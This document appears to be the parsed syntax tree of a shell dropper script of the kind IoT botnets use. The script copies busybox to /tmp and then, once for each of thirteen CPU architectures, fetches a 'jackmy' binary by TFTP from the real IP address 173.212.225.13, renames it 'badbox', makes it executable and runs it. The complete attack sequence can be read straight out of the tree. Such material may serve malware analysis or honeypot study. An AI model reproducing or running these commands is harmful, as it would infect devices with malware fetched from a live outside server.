CommandNode(lineno=2, pos=(12, 28), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 28), word='999999'),
])
CommandNode(lineno=3, pos=(29, 50), parts=[
  WordNode(lineno=3, pos=(29, 31), word='cp'),
  WordNode(lineno=3, pos=(32, 44), word='/bin/busybox'),
  WordNode(lineno=3, pos=(45, 50), word='/tmp/'),
])
ListNode(lineno=4, pos=(51, 140), parts=[
  CommandNode(lineno=4, pos=(51, 58), parts=[
    WordNode(lineno=4, pos=(51, 53), word='cd'),
    WordNode(lineno=4, pos=(54, 58), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(58, 59)),
  CommandNode(lineno=4, pos=(60, 97), parts=[
    WordNode(lineno=4, pos=(60, 64), word='tftp'),
    WordNode(lineno=4, pos=(65, 79), word='173.212.225.13'),
    WordNode(lineno=4, pos=(80, 82), word='-c'),
    WordNode(lineno=4, pos=(83, 86), word='get'),
    WordNode(lineno=4, pos=(87, 97), word='jackmymips'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(97, 98)),
  CommandNode(lineno=4, pos=(98, 120), parts=[
    WordNode(lineno=4, pos=(98, 101), word='cat'),
    WordNode(lineno=4, pos=(102, 112), word='jackmymips'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(114, 120), word='badbox'), pos=(113, 120), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(120, 121)),
  CommandNode(lineno=4, pos=(121, 131), parts=[
    WordNode(lineno=4, pos=(121, 126), word='chmod'),
    WordNode(lineno=4, pos=(127, 129), word='+x'),
    WordNode(lineno=4, pos=(130, 131), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(131, 132)),
  CommandNode(lineno=4, pos=(132, 140), parts=[
    WordNode(lineno=4, pos=(132, 140), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(141, 234), parts=[
  CommandNode(lineno=5, pos=(141, 148), parts=[
    WordNode(lineno=5, pos=(141, 143), word='cd'),
    WordNode(lineno=5, pos=(144, 148), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(148, 149)),
  CommandNode(lineno=5, pos=(150, 189), parts=[
    WordNode(lineno=5, pos=(150, 154), word='tftp'),
    WordNode(lineno=5, pos=(155, 169), word='173.212.225.13'),
    WordNode(lineno=5, pos=(170, 172), word='-c'),
    WordNode(lineno=5, pos=(173, 176), word='get'),
    WordNode(lineno=5, pos=(177, 189), word='jackmymipsel'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(189, 190)),
  CommandNode(lineno=5, pos=(190, 214), parts=[
    WordNode(lineno=5, pos=(190, 193), word='cat'),
    WordNode(lineno=5, pos=(194, 206), word='jackmymipsel'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(208, 214), word='badbox'), pos=(207, 214), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(214, 215)),
  CommandNode(lineno=5, pos=(215, 225), parts=[
    WordNode(lineno=5, pos=(215, 220), word='chmod'),
    WordNode(lineno=5, pos=(221, 223), word='+x'),
    WordNode(lineno=5, pos=(224, 225), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(225, 226)),
  CommandNode(lineno=5, pos=(226, 234), parts=[
    WordNode(lineno=5, pos=(226, 234), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(235, 322), parts=[
  CommandNode(lineno=6, pos=(235, 242), parts=[
    WordNode(lineno=6, pos=(235, 237), word='cd'),
    WordNode(lineno=6, pos=(238, 242), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(242, 243)),
  CommandNode(lineno=6, pos=(244, 280), parts=[
    WordNode(lineno=6, pos=(244, 248), word='tftp'),
    WordNode(lineno=6, pos=(249, 263), word='173.212.225.13'),
    WordNode(lineno=6, pos=(264, 266), word='-c'),
    WordNode(lineno=6, pos=(267, 270), word='get'),
    WordNode(lineno=6, pos=(271, 280), word='jackmysh4'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(280, 281)),
  CommandNode(lineno=6, pos=(281, 302), parts=[
    WordNode(lineno=6, pos=(281, 284), word='cat'),
    WordNode(lineno=6, pos=(285, 294), word='jackmysh4'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(296, 302), word='badbox'), pos=(295, 302), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(302, 303)),
  CommandNode(lineno=6, pos=(303, 313), parts=[
    WordNode(lineno=6, pos=(303, 308), word='chmod'),
    WordNode(lineno=6, pos=(309, 311), word='+x'),
    WordNode(lineno=6, pos=(312, 313), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(313, 314)),
  CommandNode(lineno=6, pos=(314, 322), parts=[
    WordNode(lineno=6, pos=(314, 322), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(323, 410), parts=[
  CommandNode(lineno=7, pos=(323, 330), parts=[
    WordNode(lineno=7, pos=(323, 325), word='cd'),
    WordNode(lineno=7, pos=(326, 330), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(330, 331)),
  CommandNode(lineno=7, pos=(332, 368), parts=[
    WordNode(lineno=7, pos=(332, 336), word='tftp'),
    WordNode(lineno=7, pos=(337, 351), word='173.212.225.13'),
    WordNode(lineno=7, pos=(352, 354), word='-c'),
    WordNode(lineno=7, pos=(355, 358), word='get'),
    WordNode(lineno=7, pos=(359, 368), word='jackmyx86'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(368, 369)),
  CommandNode(lineno=7, pos=(369, 390), parts=[
    WordNode(lineno=7, pos=(369, 372), word='cat'),
    WordNode(lineno=7, pos=(373, 382), word='jackmyx86'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(384, 390), word='badbox'), pos=(383, 390), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(390, 391)),
  CommandNode(lineno=7, pos=(391, 401), parts=[
    WordNode(lineno=7, pos=(391, 396), word='chmod'),
    WordNode(lineno=7, pos=(397, 399), word='+x'),
    WordNode(lineno=7, pos=(400, 401), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(401, 402)),
  CommandNode(lineno=7, pos=(402, 410), parts=[
    WordNode(lineno=7, pos=(402, 410), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(411, 502), parts=[
  CommandNode(lineno=8, pos=(411, 418), parts=[
    WordNode(lineno=8, pos=(411, 413), word='cd'),
    WordNode(lineno=8, pos=(414, 418), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(418, 419)),
  CommandNode(lineno=8, pos=(420, 458), parts=[
    WordNode(lineno=8, pos=(420, 424), word='tftp'),
    WordNode(lineno=8, pos=(425, 439), word='173.212.225.13'),
    WordNode(lineno=8, pos=(440, 442), word='-c'),
    WordNode(lineno=8, pos=(443, 446), word='get'),
    WordNode(lineno=8, pos=(447, 458), word='jackmyarmv6'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(458, 459)),
  CommandNode(lineno=8, pos=(459, 482), parts=[
    WordNode(lineno=8, pos=(459, 462), word='cat'),
    WordNode(lineno=8, pos=(463, 474), word='jackmyarmv6'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(476, 482), word='badbox'), pos=(475, 482), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(482, 483)),
  CommandNode(lineno=8, pos=(483, 493), parts=[
    WordNode(lineno=8, pos=(483, 488), word='chmod'),
    WordNode(lineno=8, pos=(489, 491), word='+x'),
    WordNode(lineno=8, pos=(492, 493), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(493, 494)),
  CommandNode(lineno=8, pos=(494, 502), parts=[
    WordNode(lineno=8, pos=(494, 502), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(503, 592), parts=[
  CommandNode(lineno=9, pos=(503, 510), parts=[
    WordNode(lineno=9, pos=(503, 505), word='cd'),
    WordNode(lineno=9, pos=(506, 510), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(510, 511)),
  CommandNode(lineno=9, pos=(512, 549), parts=[
    WordNode(lineno=9, pos=(512, 516), word='tftp'),
    WordNode(lineno=9, pos=(517, 531), word='173.212.225.13'),
    WordNode(lineno=9, pos=(532, 534), word='-c'),
    WordNode(lineno=9, pos=(535, 538), word='get'),
    WordNode(lineno=9, pos=(539, 549), word='jackmyi686'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(549, 550)),
  CommandNode(lineno=9, pos=(550, 572), parts=[
    WordNode(lineno=9, pos=(550, 553), word='cat'),
    WordNode(lineno=9, pos=(554, 564), word='jackmyi686'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(566, 572), word='badbox'), pos=(565, 572), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(572, 573)),
  CommandNode(lineno=9, pos=(573, 583), parts=[
    WordNode(lineno=9, pos=(573, 578), word='chmod'),
    WordNode(lineno=9, pos=(579, 581), word='+x'),
    WordNode(lineno=9, pos=(582, 583), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(583, 584)),
  CommandNode(lineno=9, pos=(584, 592), parts=[
    WordNode(lineno=9, pos=(584, 592), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(593, 688), parts=[
  CommandNode(lineno=10, pos=(593, 600), parts=[
    WordNode(lineno=10, pos=(593, 595), word='cd'),
    WordNode(lineno=10, pos=(596, 600), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(600, 601)),
  CommandNode(lineno=10, pos=(602, 642), parts=[
    WordNode(lineno=10, pos=(602, 606), word='tftp'),
    WordNode(lineno=10, pos=(607, 621), word='173.212.225.13'),
    WordNode(lineno=10, pos=(622, 624), word='-c'),
    WordNode(lineno=10, pos=(625, 628), word='get'),
    WordNode(lineno=10, pos=(629, 642), word='jackmypowerpc'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(642, 643)),
  CommandNode(lineno=10, pos=(643, 668), parts=[
    WordNode(lineno=10, pos=(643, 646), word='cat'),
    WordNode(lineno=10, pos=(647, 660), word='jackmypowerpc'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(662, 668), word='badbox'), pos=(661, 668), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(668, 669)),
  CommandNode(lineno=10, pos=(669, 679), parts=[
    WordNode(lineno=10, pos=(669, 674), word='chmod'),
    WordNode(lineno=10, pos=(675, 677), word='+x'),
    WordNode(lineno=10, pos=(678, 679), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(679, 680)),
  CommandNode(lineno=10, pos=(680, 688), parts=[
    WordNode(lineno=10, pos=(680, 688), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(689, 778), parts=[
  CommandNode(lineno=11, pos=(689, 696), parts=[
    WordNode(lineno=11, pos=(689, 691), word='cd'),
    WordNode(lineno=11, pos=(692, 696), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(696, 697)),
  CommandNode(lineno=11, pos=(698, 735), parts=[
    WordNode(lineno=11, pos=(698, 702), word='tftp'),
    WordNode(lineno=11, pos=(703, 717), word='173.212.225.13'),
    WordNode(lineno=11, pos=(718, 720), word='-c'),
    WordNode(lineno=11, pos=(721, 724), word='get'),
    WordNode(lineno=11, pos=(725, 735), word='jackmyi586'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(735, 736)),
  CommandNode(lineno=11, pos=(736, 758), parts=[
    WordNode(lineno=11, pos=(736, 739), word='cat'),
    WordNode(lineno=11, pos=(740, 750), word='jackmyi586'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(752, 758), word='badbox'), pos=(751, 758), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(758, 759)),
  CommandNode(lineno=11, pos=(759, 769), parts=[
    WordNode(lineno=11, pos=(759, 764), word='chmod'),
    WordNode(lineno=11, pos=(765, 767), word='+x'),
    WordNode(lineno=11, pos=(768, 769), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(769, 770)),
  CommandNode(lineno=11, pos=(770, 778), parts=[
    WordNode(lineno=11, pos=(770, 778), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(779, 868), parts=[
  CommandNode(lineno=12, pos=(779, 786), parts=[
    WordNode(lineno=12, pos=(779, 781), word='cd'),
    WordNode(lineno=12, pos=(782, 786), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(786, 787)),
  CommandNode(lineno=12, pos=(788, 825), parts=[
    WordNode(lineno=12, pos=(788, 792), word='tftp'),
    WordNode(lineno=12, pos=(793, 807), word='173.212.225.13'),
    WordNode(lineno=12, pos=(808, 810), word='-c'),
    WordNode(lineno=12, pos=(811, 814), word='get'),
    WordNode(lineno=12, pos=(815, 825), word='jackmym86k'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(825, 826)),
  CommandNode(lineno=12, pos=(826, 848), parts=[
    WordNode(lineno=12, pos=(826, 829), word='cat'),
    WordNode(lineno=12, pos=(830, 840), word='jackmym86k'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(842, 848), word='badbox'), pos=(841, 848), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(848, 849)),
  CommandNode(lineno=12, pos=(849, 859), parts=[
    WordNode(lineno=12, pos=(849, 854), word='chmod'),
    WordNode(lineno=12, pos=(855, 857), word='+x'),
    WordNode(lineno=12, pos=(858, 859), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(859, 860)),
  CommandNode(lineno=12, pos=(860, 868), parts=[
    WordNode(lineno=12, pos=(860, 868), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(869, 960), parts=[
  CommandNode(lineno=13, pos=(869, 876), parts=[
    WordNode(lineno=13, pos=(869, 871), word='cd'),
    WordNode(lineno=13, pos=(872, 876), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(876, 877)),
  CommandNode(lineno=13, pos=(878, 916), parts=[
    WordNode(lineno=13, pos=(878, 882), word='tftp'),
    WordNode(lineno=13, pos=(883, 897), word='173.212.225.13'),
    WordNode(lineno=13, pos=(898, 900), word='-c'),
    WordNode(lineno=13, pos=(901, 904), word='get'),
    WordNode(lineno=13, pos=(905, 916), word='jackmysparc'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(916, 917)),
  CommandNode(lineno=13, pos=(917, 940), parts=[
    WordNode(lineno=13, pos=(917, 920), word='cat'),
    WordNode(lineno=13, pos=(921, 932), word='jackmysparc'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(934, 940), word='badbox'), pos=(933, 940), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(940, 941)),
  CommandNode(lineno=13, pos=(941, 951), parts=[
    WordNode(lineno=13, pos=(941, 946), word='chmod'),
    WordNode(lineno=13, pos=(947, 949), word='+x'),
    WordNode(lineno=13, pos=(950, 951), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(951, 952)),
  CommandNode(lineno=13, pos=(952, 960), parts=[
    WordNode(lineno=13, pos=(952, 960), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(961, 1052), parts=[
  CommandNode(lineno=14, pos=(961, 968), parts=[
    WordNode(lineno=14, pos=(961, 963), word='cd'),
    WordNode(lineno=14, pos=(964, 968), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(968, 969)),
  CommandNode(lineno=14, pos=(970, 1008), parts=[
    WordNode(lineno=14, pos=(970, 974), word='tftp'),
    WordNode(lineno=14, pos=(975, 989), word='173.212.225.13'),
    WordNode(lineno=14, pos=(990, 992), word='-c'),
    WordNode(lineno=14, pos=(993, 996), word='get'),
    WordNode(lineno=14, pos=(997, 1008), word='jackmyarmv4'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1008, 1009)),
  CommandNode(lineno=14, pos=(1009, 1032), parts=[
    WordNode(lineno=14, pos=(1009, 1012), word='cat'),
    WordNode(lineno=14, pos=(1013, 1024), word='jackmyarmv4'),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1026, 1032), word='badbox'), pos=(1025, 1032), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1032, 1033)),
  CommandNode(lineno=14, pos=(1033, 1043), parts=[
    WordNode(lineno=14, pos=(1033, 1038), word='chmod'),
    WordNode(lineno=14, pos=(1039, 1041), word='+x'),
    WordNode(lineno=14, pos=(1042, 1043), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1043, 1044)),
  CommandNode(lineno=14, pos=(1044, 1052), parts=[
    WordNode(lineno=14, pos=(1044, 1052), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1053, 1144), parts=[
  CommandNode(lineno=15, pos=(1053, 1060), parts=[
    WordNode(lineno=15, pos=(1053, 1055), word='cd'),
    WordNode(lineno=15, pos=(1056, 1060), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1060, 1061)),
  CommandNode(lineno=15, pos=(1062, 1100), parts=[
    WordNode(lineno=15, pos=(1062, 1066), word='tftp'),
    WordNode(lineno=15, pos=(1067, 1081), word='173.212.225.13'),
    WordNode(lineno=15, pos=(1082, 1084), word='-c'),
    WordNode(lineno=15, pos=(1085, 1088), word='get'),
    WordNode(lineno=15, pos=(1089, 1100), word='jackmyarmv5'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1100, 1101)),
  CommandNode(lineno=15, pos=(1101, 1124), parts=[
    WordNode(lineno=15, pos=(1101, 1104), word='cat'),
    WordNode(lineno=15, pos=(1105, 1116), word='jackmyarmv5'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1118, 1124), word='badbox'), pos=(1117, 1124), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1124, 1125)),
  CommandNode(lineno=15, pos=(1125, 1135), parts=[
    WordNode(lineno=15, pos=(1125, 1130), word='chmod'),
    WordNode(lineno=15, pos=(1131, 1133), word='+x'),
    WordNode(lineno=15, pos=(1134, 1135), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1135, 1136)),
  CommandNode(lineno=15, pos=(1136, 1144), parts=[
    WordNode(lineno=15, pos=(1136, 1144), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1145, 1246), parts=[
  CommandNode(lineno=16, pos=(1145, 1152), parts=[
    WordNode(lineno=16, pos=(1145, 1147), word='cd'),
    WordNode(lineno=16, pos=(1148, 1152), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1152, 1153)),
  CommandNode(lineno=16, pos=(1154, 1197), parts=[
    WordNode(lineno=16, pos=(1154, 1158), word='tftp'),
    WordNode(lineno=16, pos=(1159, 1173), word='173.212.225.13'),
    WordNode(lineno=16, pos=(1174, 1176), word='-c'),
    WordNode(lineno=16, pos=(1177, 1180), word='get'),
    WordNode(lineno=16, pos=(1181, 1197), word='jackmypowerpc440'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1197, 1198)),
  CommandNode(lineno=16, pos=(1198, 1226), parts=[
    WordNode(lineno=16, pos=(1198, 1201), word='cat'),
    WordNode(lineno=16, pos=(1202, 1218), word='jackmypowerpc440'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1220, 1226), word='badbox'), pos=(1219, 1226), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1226, 1227)),
  CommandNode(lineno=16, pos=(1227, 1237), parts=[
    WordNode(lineno=16, pos=(1227, 1232), word='chmod'),
    WordNode(lineno=16, pos=(1233, 1235), word='+x'),
    WordNode(lineno=16, pos=(1236, 1237), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1237, 1238)),
  CommandNode(lineno=16, pos=(1238, 1246), parts=[
    WordNode(lineno=16, pos=(1238, 1246), word='./badbox'),
  ]),
])
